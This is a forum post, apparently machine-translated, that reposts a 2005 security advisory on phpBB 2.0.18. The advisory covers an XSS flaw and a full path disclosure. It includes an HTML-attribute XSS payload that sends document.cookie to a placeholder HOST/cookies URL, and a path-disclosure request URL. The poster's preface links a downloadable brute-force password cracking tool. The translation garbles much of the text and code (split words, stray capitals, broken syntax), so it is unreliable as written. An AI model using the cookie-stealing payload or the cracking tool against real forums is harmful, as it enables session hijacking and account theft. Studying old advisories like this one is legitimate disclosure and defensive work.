PhpBB Forum program: new problems in the old revolution

PhpBB 2.0.18 XSS and Full Path Disclosure

Details: SecurityAlert

There is also a brute-force cracking tool, which is a single-threaded tool and has no big use. It is a matter of fact, what phpbb can be used to run passwords?

Download: http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar

Topic: phpBB 2.0.18 XSS and Full Path Disclosure

SecurityAlert Id: 269

SecurityRisk: Low

Remote Exploit: Yes

Local Exploit: No

Exploit Given: Yes

Credit: Maksymilian Arciemowicz

Date: 17.12.2005

Affected Software: phpBB <= 2.0.18

Advisory Text:

----- Begin pgp signed message -----

Hash: SHA1

[PhpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date: 16.12.2005

From securityreason.com TEAM

---- 0. Description ---

PhpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar

D package. phpBB has a user-friendly interface, simple and straightforward administration

Panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL

, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so

Lution for all web sites.

Contact with author http://www.phpbb.com/about.php.

---- 1. XSS ---

If in phpbb is Allowed HTML tags "ON" like B, I, u, pre and have you in profile "Always al

Low HTML: YES "or are you Guest

That you can use this tags:

<B c = ">" onmouseover = "alert ('securityreason. com')" X = "<B"> h e l o </B>

Exploit:

<B C = ">" onmouseover = "alert (document. location = 'HTTP: // HOST/cookies? '+ Document. cookie)

"X =" <B "> h a l o </B>

And have you cookies.

---- 2. Full Path Disclosure ---

In file admin/admin_disallow.php is

--25-31 ---

If (! Empty ($ setmodules ))

{

$ Filename = basename (_ FILE __);

$ Module ['users'] ['disallow'] = append_sid ($ filename );

Return;

}

--25-31 ---

Function append_sid () dosen't exists. And if you have:

Register_globals = On

Display_errors = On

Try to go:

Http: // [HOST]/[DIR]/admin/admin_disallow.php? Setmodules = 1

--Result error ---

Fatal error: Call to undefined function: append_sid () in/www/2018/phpBB2/admin/admin_disa

Llow. php on line 28

--Result error ---

---- 3. Greets ---

Sp3x

---- 4. Contact ---

Author: Maksymilian Arciemowicz <cXIb8O3>

Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Securityreason.com TEAM

----- Begin pgp signature -----

Version: GnuPG v1.4.2 (FreeBSD)

ID8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D

/0u14EN2sQAh1Bwu0yvT48Q =

= LsL8

----- End pgp signature -----

Oh, by the way, the one at the top may seem like I guess it means:

Personalized signature:

The personalized signature you entered is automatically included at the bottom of your published article. A personalized signature can contain 512 characters.

Disable HTML tags

Allowed style labels

Emoticon icons allowed

Find "HTML tags allowed"